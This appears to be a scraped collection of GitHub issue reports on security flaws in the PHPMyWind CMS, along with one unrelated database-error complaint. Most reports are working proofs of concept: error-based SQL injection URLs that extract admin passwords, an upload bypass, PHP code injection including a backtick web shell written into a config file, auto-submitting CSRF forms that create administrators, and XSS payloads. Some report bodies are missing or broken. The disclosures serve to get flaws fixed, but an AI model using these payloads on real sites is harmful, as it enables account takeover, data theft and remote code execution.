欢迎大家来围观

Product Homepage:http://phpmywind.com/
hello!
I found a serious SQL injection vulnerability in the backend management system(/admin/admin_save.php) of PHPMyWind v5.6

This vulnerability allows low-privilege site administrators to gain access to super-administrator accounts and passwords

Vulnerability validation：
First, there are three types of administrators in the current system: super administrators, site administrators, and article publishers

Now to the site administrator login background management system, click the administrator management, and then "delete function" is the location of the vulnerability

it's url is http://127.0.0.1/admin/admin_save.php?action=del&id=4

POC
(1)
http://127.0.0.1/admin/admin_save.php?action=del&id=4%27

(2)show the current database

http://127.0.0.1/admin/admin_save.php?action=del&id=4%20%20and%20id%20in%20(char(@`%27`),updatexml(1,concat(0x7e,(select%20database())),1),char(@`%27`))

(3) Query out the super administrator password

http://127.0.0.1/admin/admin_save.php?action=del&id=4  and id in (char(@`'`),updatexml(1,concat(0x7e,(select password from pmw_admin limit 0,1)),1),char(@`'`))

This vulnerability allows you to query the database for any data you want

1.login as admin
2.visit website setting
upload type add PHP (space)

because Windows will remove the space so by pass suffix check
3.upload a php file like name info.PHP

filename add a space
you can see upload success

4.visit the link
you can see php code was execute

becaue at data/httpfile/upload.class.php

you do not check the input filename

so trim(filename) can help you

author by [email protected]

version 5.6

hi:
I found a php code execute in /admin/web_config.php at version5.6
1.Login as admin
2. open http://192.168.10.12/admin/default.php
3.at the setting watermark input the payload

Watermark text input xxx'
Text color input ;phpinfo();//

4.submit and visit watermark setting you can see the php code execute

because the payload was write in /data/watermark.inc.php

the watermark.inc.php was inclue by require_once so php code execute

suggest:
replace ' ,,;,(,)

version:5.6
author by [email protected]

I hope you can fix it

Product Homepage: http://phpmywind.com/

Software link: https://github.com/gaozhifeng/PHPMyWind

Version: v5.6

The backend code writes the new user data to the database without authentication such as token

	if($dosql->GetOne("SELECT `id` FROM `$tbname` WHERE `username`='$username'"))
	{
		ShowMsg('用户名已存在！', '-1');
		exit();
	}


	$password  = md5(md5($password));
	$loginip   = '127.0.0.1';
	$logintime = time();

	$sql = "INSERT INTO `$tbname` (username, password, nickname, question, answer, levelname, checkadmin, loginip, logintime) VALUES ('$username', '$password', '$nickname', '$question', '$answer', '$levelname', '$checkadmin', '$loginip', '$logintime')";
	if($dosql->ExecNoneQuery($sql))
	{
		header("location:$gourl");
		exit();
	}

When the background administrator clicks the malicious link, the background will add an administrator user

PoC:

<html>
<body>
<form action="http://127.0.0.1:9000/admin/admin_save.php" method="POST"> 
<html>
    <form action="http://127.0.0.1:9000/admin/admin_save.php" method="POST">
      <input type="hidden" name="username" value="admincsrf" />
      <input type="hidden" name="password" value="admin" />
      <input type="hidden" name="repassword" value="admin" />
      <input type="hidden" name="question" value="0" />
      <input type="hidden" name="answer" value="" />
      <input type="hidden" name="nickname" value="" />
      <input type="hidden" name="levelname" value="1" />
      <input type="hidden" name="checkadmin" value="true" />
      <input type="hidden" name="action" value="add" />
      <input type="submit" value="Submit request" />
</form> 
<script> 
    document.forms[0].submit();
</script>
</body>
</html>

There is no Token authentication when adding administrator users.
/admin/admin_save.php
The core code is as follows

if($action == 'add')
{
	if($cfg_adminlevel > 1 and $levelname == 1)
	{
		ShowMsg('非法的操作，不能创建超级管理员！', '-1');
		exit();
	}
	

	$password  = md5(md5($password));
	$loginip   = '127.0.0.1';
	$logintime = time();

	$sql = "INSERT INTO `$tbname` (username, password, nickname, question, answer, levelname, checkadmin, loginip, logintime) VALUES ('$username', '$password', '$nickname', '$question', '$answer', '$levelname', '$checkadmin', '$loginip', '$logintime')";
	if($dosql->ExecNoneQuery($sql))
	{
		header("location:$gourl");
		exit();
	}
}

After the administrator logs in, just click on the attack page, and the administrative user will be added.
poc：

<html>
<body>
<form name="form" method="post" action="http://localhost/phpmywind/admin/admin_save.php">
		<input type="hidden" name="username" value="csrf">
		<input type="hidden" name="password" value="123456">
		<input type="hidden" name="repassword" value="123456">
		<input type="hidden" name="question" value="0">
		<input type="hidden" name="levelname" value="1">
		<input type="hidden" name="checkadmin" value="true">
		<input type="hidden" name="action" value="add">
		<input type="submit" value="Submit request" />
</form>
</body>
 <script>
   setInterval("document.all.form.submit()",1)
 </script>
</html>

There is an xss vulnerability in your latest version of the v5.6

No security check in page phpmywind/admin/infolist_add.php

When I add a new article, I use "<script>alert(/xss/)</script>" as the title

then back to the PHPMYWIND/admin/infolist.php

background page executed a javascript script

javascript also executed on mainpage

Fix:

Strictly verify user input, you must perform strict checks and html escape escaping on all input scripts, iframes, etc. The input here is not only the input interface that the user can directly interact with, but also the variables in the HTTP request in the HTTP request, the variables in the HTTP request header, and so on.
Verify the data type and verify its format, length, scope, and content.
Not only need to be verified on the client side but also on the server side.
The output data should also be checked. The values in the database may be output in multiple places on a large website. Even if the input is coded, the security check should be performed at the output points.

#Author: KietNA from 1nv1cta team, HPT CyberSecurity Center
#Submit date: 22/08/2021
#Condition: Admin user
#Version: v5.6
#Description:
Becase of filtered input without "<, >, ?, =, `,...." In WriteConfig() function, the attacker can inject php code to /include/config.cache.php file. The attacker can append ?> to close php syntax and adding new php function

In /admin/site_save.php file

WriteF() function:

###PoC:

In config.cache.php file

Then back to .php files in /admin/ directory to execute code

###Request

POST /admin/site_save.php HTTP/1.1
Host: 172.16.0.12:2222
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
Origin: http://172.16.0.12:2222
Connection: close
Referer: http://172.16.0.12:2222/admin/site_add.php
Cookie: PortalOpenEMR=BKEx0ZLJ9X41gReq-UHNt-aC0jHNPiQLUOf7FXckqCAumudg; OpenEMR=UwreHaTw9iqwJWXqAY3%2CWYkZgvA3wdVmymdC5QqiVC1H2scM; loader=loaded; admin_lang=cn; home_lang=cn; workspaceParam=users_index%7CMember; referurl=%2Findex.php%3Fm%3Duser%26c%3DUsers%26a%3Dcentre; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_IS_UPHTML=0; users_id=1; PHPSESSID=qhclrgdoah7rbv9l34fvj07h00
Upgrade-Insecure-Requests: 1

site_name=123&site_key=kietna?><?=`$_GET[0]`?><?&site_lang=testtest&webname=123&weburl=http%3A%2F%2F172.16.0.12%3A2222&webpath=123&webswitch=Y&action=add

###Response

HTTP/1.1 200 OK
Date: Sun, 22 Aug 2021 07:54:03 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
X-Powered-By: PHP/7.3.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 12942

<script type="text/javascript">window.top.location.reload();</script>

When I visit the next three url, my code will be injected to the source code of the page at the location of page number area.
http://localhost/wind/newsshow.php?cid=4"onmouseover='FeGh(9201)&id=19
http://localhost/wind/news.php?"onmouseover='FeGh(9201)'bad="
http://localhost/wind/about.php?"onmouseover='B427(9671)'bad="

Then, you can use browser check the source code cf the page, you will find the payload code in the code where is page number area.

The vul coursed by the "$nowurl" in “page.class.php"

i found a sql injection vulnerability in the backend management system of PHPMyWind 5.6
The relevant source code is as follows:

//修改管理员
else if($action == 'update')
{

	//创始人账号不允许更改状态
	if($id == 1 and ($checkadmin != 'true' or $levelname != '1'))
	{
		ShowMsg('抱歉，不能更改创始账号状态！','-1');
		exit();
	}


	//只有超级管理员才有权修改超级管理员
	if($cfg_adminlevel > 1 and $levelname == 1)
	{
		ShowMsg('非法的操作，不能修改为超级管理员！', '-1');
		exit();
	}


	if($password == '')
	{
		$sql = "UPDATE `$tbname` SET nickname='$nickname', question='$question', answer='$answer', levelname='$levelname', checkadmin='$checkadmin' WHERE `id`=$id";
	}
	else
	{
		$oldpwd   = md5(md5($oldpwd));
		$password = md5(md5($password));

		$r = $dosql->GetOne("SELECT `password` FROM `#@__admin` WHERE `id`=$id");
		if($r['password'] != $oldpwd)
		{
			ShowMsg('抱歉，旧密码错误！','-1');
			exit();
		}

		$sql = "UPDATE `$tbname` SET password='$password', nickname='$nickname', question='$question', answer='$answer', levelname='$levelname', checkadmin='$checkadmin' WHERE id=$id";
	}

	if($dosql->ExecNoneQuery($sql))
	{
		header("location:$gourl");
		exit();
	}
}

All three SQL here are vulnerability,because the variable '$id' is not protected by single quotes.

Vulnerability validation：
First , we enter in this page by super administrators account or site administrators account

and click the modify buttom

Click submit and use burp to intercept to modify the variable $id to injection

POC

AND id in (char(@`'`), updatexml(1,(concat(0x7e,(select password from pmw_member limit 0,1),0x7e)),1),char(@`'`))

建议把图片上传的插件改为非flash，以便将来更好支持更新浏览器

错误信息：连接数据库失败，可能数据库密码不对或数据库服务器出错！

软件版本号： 5.4 Beta

服务器版本： nginx/1.8.1 | 操作系统： Linux
PHP版本号： 7.1.0 | GDLibrary： 支持
MySql版本： 5.70 | ZEND支持： 支持
支持上传的最大文件：2M

程序没动过，突然就出现上述问题

There is an xss vulnerability in your latest version of the v5.5

In the PHPMyWind_5.5/admin/templates/html/default.html：

2.Steps To Reproduce:

Fix:

1. Strictly verify user input, you must perform strict checks and html escape escaping on all input scripts, iframes, etc. The input here is not only the input interface that the user can directly interact with, but also the variables in the HTTP request in the HTTP request, the variables in the HTTP request header, and so on.
2. Verify the data type and verify its format, length, scope, and content.
3. Not only need to be verified on the client side but also on the server side.
4. The output data should also be checked. The values in the database may be output in multiple places on a large website. Even if the input is coded, the security check should be performed at the output points.